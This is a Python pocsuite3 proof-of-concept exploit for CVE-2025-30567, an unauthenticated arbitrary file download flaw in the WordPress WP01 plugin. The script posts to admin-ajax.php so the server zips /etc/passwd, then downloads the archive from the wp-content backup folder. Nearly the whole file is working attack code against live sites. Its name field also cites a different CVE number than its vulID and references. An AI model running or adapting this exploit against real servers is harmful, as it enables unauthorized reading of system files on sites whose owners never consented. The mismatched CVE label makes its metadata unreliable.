#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from pocsuite3.api import (
    minimum_version_required, POCBase, register_poc, requests, logger,
    OptString, OrderedDict,
    random_str,
    re,
    Output
)

minimum_version_required('2.1.0')


class POC(POCBase):
    vulID = 'CVE-2025-30567'
    version = '1.0'
    author = 'Oyst3r'
    vulDate = '2025-03-26'
    createDate = '2025-03-26'
    updateDate = '2025-03-26'
    references = ['https://nvd.nist.gov/vuln/detail/CVE-2025-30567']
    name = 'Unauthorized Arbitrary File Download in WordPress WP01(CVE-2025-29927)'
    appPowerLink = 'https://ru.wordpress.org/plugins/wp01/'
    appName = 'WordPress WP01'
    appVersion = '2.6.2'
    vulType = 'Arbitrary_File_Download'
    desc = 'The plugin\'s make_archive method lacks proper functionality checks and authorization handling, allowing unauthorized users to download arbitrary files from the server.'
    samples = ['']
    install_requires = ['']
    pocDesc = 'Poc_CVE-2025-30567'
    dork = {'Quake': ''}
    suricata_request = ''
    suricata_response = ''

    def _verify(self):
        result = {}
        target_url_one = self.url.rstrip("/") + "/wp-admin/admin-ajax.php?action=wp01_generate_zip_archive"
        target_url_two = self.url.rstrip("/") + "/wp-content/wp01-backup/wp-01-passwd.zip"
        headers_post ={
            'accept': '*/*',
            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36',
            'Accept-Encoding': 'gzip, deflate, br',
            'Accept-Language': 'zh-CN,zh;q=0.9',
            'Content-Type': 'application/x-www-form-urlencoded',
        }
        headers_get = {
            'Accept': '*/*',
            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36',
            'Accept-Encoding': 'gzip, deflate, br',
            'Accept-Language': 'zh-CN,zh;q=0.9',
        }
        data = f'target=passwd&path=/etc/'

        try:
            resp_one = requests.post(target_url_one, data=data, headers=headers_post, verify=False)

            if (resp_one.status_code == 200 and re.search(r'{"url":.*?wp-content.*\.zip"}', resp_one.text)):
                logger.debug(f"开始获取 passwd: {target_url_two}")
                resp_two = requests.get(target_url_two, headers=headers_get, verify=False)

                if resp_two.status_code == 200:
                    logger.debug("passwd获取成功")

                    result["VerifyInfo"] = {
                        "URL": target_url_two,
                    }

        except Exception as e:
            logger.error(f"请求异常: {str(e)}")

        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail("目标未受漏洞影响")
        return output
    
register_poc(POC)